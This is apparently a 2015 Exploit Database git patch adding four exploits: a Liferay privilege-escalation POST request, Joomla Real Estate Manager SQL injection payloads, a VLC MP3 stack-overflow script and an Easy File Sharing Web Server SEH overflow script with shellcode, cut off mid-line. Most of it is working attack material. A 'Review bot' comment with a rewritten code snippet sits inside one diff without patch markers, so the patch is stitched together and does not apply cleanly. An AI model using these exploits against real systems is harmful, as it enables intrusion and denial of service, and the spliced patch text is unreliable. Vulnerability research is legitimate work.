From a3e2d9b7a287d32b0b8a25914987502c771a23ed Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sun, 25 Oct 2015 05:03:17 +0000
Subject: [PATCH] DB: 2015-10-25

4 new exploits
---
files.csv | 4 ++
platforms/php/webapps/38443.txt | 41 ++++++++++++++
platforms/php/webapps/38445.txt | 58 ++++++++++++++++++++
platforms/windows/dos/38485.py | 42 +++++++++++++++
platforms/windows/remote/38526.py | 90 +++++++++++++++++++++++++++++++
5 files changed, 235 insertions(+)
create mode 100755 platforms/php/webapps/38443.txt
create mode 100755 platforms/php/webapps/38445.txt
create mode 100755 platforms/windows/dos/38485.py
create mode 100755 platforms/windows/remote/38526.py

diff --git a/files.csv b/files.csv
index c26ff7aef..0e2b8b28c 100755
--- a/files.csv
+++ b/files.csv
@@ -34727,7 +34727,9 @@ id,file,description,date,author,platform,type,port
 38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross Site Scripting Vulnerability",2013-04-09,Beni_Vanda,php,webapps,0
 38440,platforms/php/webapps/38440.txt,"phpMyAdmin 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0
 38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection Vulnerability",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0
+38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0
 38444,platforms/win32/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win32,dos,0
+38445,platforms/php/webapps/38445.txt,"Joomla Real Estate Manager Component 3.7 - SQL injection",2015-10-11,"Omer Ramić",php,webapps,0
 38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - CSRF Add Extension And File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0
 38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal Vulnerability",2015-10-13,"Karn Ganeshen",hardware,webapps,0
 38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
@@ -34761,6 +34763,7 @@ id,file,description,date,author,platform,type,port
 38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help <= 3.1.2 Remote File Include and Path Disclosure Vulnerabilities",2013-04-19,ITTIHACK,php,webapps,0
 38483,platforms/hardware/dos/38483.txt,"TP-LINK TL-WR741N and TL-WR741ND Routers Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0
 38484,platforms/php/webapps/38484.rb,"Wordpress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability",2015-10-18,PizzaHatHacker,php,webapps,0
+38485,platforms/windows/dos/38485.py,"VLC 2.2.1 libvlccore - (.mp3) Stack Overflow",2015-10-18,"Andrea Sindoni",windows,dos,0
 38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0
 38487,platforms/php/webapps/38487.txt,"WordPress Colormix Theme Multiple Security Vulnerablities",2013-04-21,MustLive,php,webapps,0
 38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08_ 1.00.09 - Path Traversal Vulnerability",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0
@@ -34800,5 +34803,6 @@ id,file,description,date,author,platform,type,port
 38523,platforms/php/webapps/38523.txt,"Weyal CMS Multiple SQL Injection Vulnerabilities",2013-05-23,XroGuE,php,webapps,0
 38524,platforms/php/webapps/38524.pl,"Matterdaddy Market Multiple Security Vulnerabilities",2013-05-24,KedAns-Dz,php,webapps,0
 38525,platforms/php/webapps/38525.txt,"Subrion 3.X.X - Multiple Vulnerabilities",2015-10-23,bRpsd,php,webapps,0
+38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0
 38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
 38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
diff --git a/platforms/php/webapps/38443.txt b/platforms/php/webapps/38443.txt
new file mode 100755
index 000000000..581776885
--- /dev/null
+++ b/platforms/php/webapps/38443.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Liferay 6.1.0 CE GA1 Privilege Escalation
+# Date: 18/05/2015
+# Exploit Author: Massimo De Luca - mentat.is
+# Vendor Homepage: https://www.liferay.com
+# Software Link:
+http://www.liferay.com/it/community/releases/-/asset_publisher/nSr2/content/id/18060360
+# Version: 6.1.0 CE
+# Tested on: -
+
+Explanation:
+Any logged user can change his "User Group" membership by editing the
+parameter _2_userGroupsSearchContainerPrimaryKeys in the HTTP POST REQUEST
+generated when updating his profile in the page "Manage my account". This
+may lead to privilege escalation.
+
+
+Proof of Concept:
+
+POST
+/group/control_panel/manage?p_auth=J3jbveH7&p_p_id=2&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&doAsGroupId=19&refererPlid=10839&controlPanelCategory=my&_2_struts_action=%2Fmy_account%2Fedit_user
+HTTP/1.1
+[...]
+[...]_2_organizationsSearchContainerPrimaryKeys=&_2_groupsSearchContainerPrimaryKeys=19&_2_userGroupsSearchContainerPrimaryKeys=[NEW
+GROUP ID]&_2_groupRolesRoleIds=[...]
+
+
+For your reference i'm attaching the full request in a separate file.
+
+In order to test the vulnerability on a fresh installation:
+- Create two different groups with different roles and permissions (ie:
+one with administrator permissions, and a regular user)
+-Create two different users,one for each group
+
+Solution:
+The vendor is aware of the problem and has fixed the issue in newer
+releases
+
+
+#Massimo De Luca
+#mdeluca [at] mentat.is
+#Mentat.is
\ No newline at end of file
diff --git a/platforms/php/webapps/38445.txt b/platforms/php/webapps/38445.txt
new file mode 100755
index 000000000..bae3035e4
--- /dev/null
+++ b/platforms/php/webapps/38445.txt
@@ -0,0 +1,58 @@
+# Description of component:
+This Joomla component is perfect for independent estate agents, property
+rental companies and agencies, hotel booking, hotel manage, motel booking,
+motel manage.
+
+##################################################################################################
+# Exploit Title: [Joomla component com_realestatemanager - SQL injection]
+# Google Dork: [inurl:option=com_realestatemanager]
+# Date: [2015-10-10]
+# Exploit Author: [Omer Ramić]
+# Vendor Homepage: [http://ordasoft.com/]
+# Software Link: [http://ordasoft.com/Real-Estate-Manager-Software-Joomla.html]
+# Version: [3.7] & probably all prior
+#Tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16
+##################################################################################################
+
+#Multiple vulnerable parameters (POC given only for the first parametar):
+Parameter_1: order_direction (POST)
+Parameter_2: order_field (POST)
+
+
+#The vulnerable parameters 1 & 2 are within the following request:
+POST
+/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
+HTTP/1.1
+Host: [HOST]
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101
+Firefox/38.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://
+[HOST]/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
+Cookie: security_level=0;
+9d929655f6556b9fb49bf0e118bafb11=tp72u418eemk6jdvvnctoamna0; countrytabs=0
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 37
+
+order_direction=asc&order_field=price
+
+
+
+#Vectors:
+POC_1: order_direction=asc,(SELECT (CASE WHEN (7918=7918) THEN 1 ELSE
+7918*(SELECT 7918 FROM INFORMATION_SCHEMA.CHARACTER_SETS)
+END))&order_field=price
+
+POC_2: order_direction=asc,(SELECT 1841 FROM(SELECT
+COUNT(*),CONCAT(0x716b787671,(SELECT
+(ELT(1841=1841,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM
+
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_field=price
+
+
+###################################
+# Greets to Palestine from Bosnia #
+###################################
diff --git a/platforms/windows/dos/38485.py b/platforms/windows/dos/38485.py
new file mode 100755
index 000000000..08581eb96
--- /dev/null
+++ b/platforms/windows/dos/38485.py
@@ -0,0 +1,42 @@
+# Exploit Title: VLC | libvlccore - (.mp3) Stack Overflow
+# Date: 18/10/2015
+# Exploit Author: Andrea Sindoni
+# Software Link: https://www.videolan.org/vlc/index.it.html
+# Version: 2.2.1
+# Tested on: Windows 7 Professional 64 bits
+#
+# PoC with MP3: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38485.zip
+#
+
+#APP: vlc.exe
+#ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) amd64fre
+#FOLLOWUP_NAME: MachineOwner
+#MODULE_NAME: libvlccore
+#IMAGE_NAME: libvlccore.dll
+#FAILURE_ID_HASH_STRING: um:wrong_symbols_c00000fd_libvlccore.dll!vlm_messageadd
+#Exception Hash (Major/Minor): 0x60346a4d.0x4e342e62
+#EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff)
+#ExceptionAddress: 00000000749ba933 (libvlccore!vlm_MessageAdd+0x00000000000910d3)
+# ExceptionCode: c00000fd (Stack overflow)
+# ExceptionFlags: 00000000
+#NumberParameters: 2
+# Parameter[0]: 0000000000000001
+# Parameter[1]: 0000000025ed2a20
+#
+#eax=00436f00 ebx=2fdc0100 ecx=25ed2a20 edx=00632efa esi=17fb2fdc edi=00000001
+#eip=749ba933 esp=260cfa14 ebp=260cfa78 iopl=0 nv up ei pl nz na po nc
+#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
+#
+#Stack Overflow starting at libvlccore!vlm_MessageAdd+0x00000000000910d3 (Hash=0x60346a4d.0x4e342e62)
+#
+
+import eyed3
+
+value = u'B'*6500000
+
+audiofile = eyed3.load("base.mp3")
+audiofile.tag.artist = value
+audiofile.tag.album = u'andrea'
+audiofile.tag.album_artist = u'sindoni'
+
+audiofile.tag.save()
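Review bot: The PoC dereferences `audiofile.tag` right after `eyed3.load("base.mp3")` without checking either value, so a missing or unrecognised seed file, or one that carries no ID3 tag yet, dies with an AttributeError instead of producing the crash file (as far as I recall the eyeD3 API, `load()` returns None for input it cannot parse and `.tag` is None when no tag exists). The script also hard-codes the input name and, because `save()` is called with no target, rewrites base.mp3 in place, which the header comments never mention; at minimum add `# NOTE: base.mp3 is overwritten in place with the 6.5 MB artist frame` to the header. I would take the path from argv (this needs `import sys` next to `import eyed3`), bail out cleanly when the load fails, and call `initTag()` when the file has no tag, as below.
```python
# … unchanged: crash-dump header comments and `value = u'B'*6500000` …
src = sys.argv[1] if len(sys.argv) > 1 else "base.mp3"   # seed file, rewritten in place
audiofile = eyed3.load(src)
if audiofile is None:
    raise SystemExit("eyed3 could not parse %s" % src)
if audiofile.tag is None:
    audiofile.initTag()   # seed file without an existing ID3 tag
audiofile.tag.artist = value
# … unchanged: album / album_artist assignments and save() …
```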
diff --git a/platforms/windows/remote/38526.py b/platforms/windows/remote/38526.py
new file mode 100755
index 000000000..8a22985bb
--- /dev/null
+++ b/platforms/windows/remote/38526.py
@@ -0,0 +1,90 @@
+#!/usr/bin/env python
+# Easy File Sharing Web Server v7.2 Remote SEH Based Overflow
+# The buffer overwrites ebx with 750+ offset, when sending 4059 it overwrites the EBX
+# vulnerable file /changeuser.ghp > Cookies UserID=[buf]
+# Means there are two ways to exploit changeuser.ghp
+# Tested on Win7 x64 and x86, it should work on win8/win10
+# By Audit0r
+# https://twitter.com/Audit0rSA
+
+
+import sys, socket, struct
+
+
+if len(sys.argv) <= 1:
+ print "Usage: python efsws.py [host] [port]"
+ exit()
+
+host = sys.argv[1]
+port = int(sys.argv[2])
+
+
+# https://code.google.com/p/win-exec-calc-shellcode/
+shellcode = (
+
+"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
+
+"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
+
+"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
+
+"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
+
+"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
+
+"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
+
+"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
+
+"\x1c\x39\xbd"
+
+)
+
+print "[+]Connecting to" + host
+
+
+craftedreq = "A"*4059
+
+craftedreq += "\xeb\x06\x90\x90" # basic SEH jump
+
+craftedreq += struct.pack("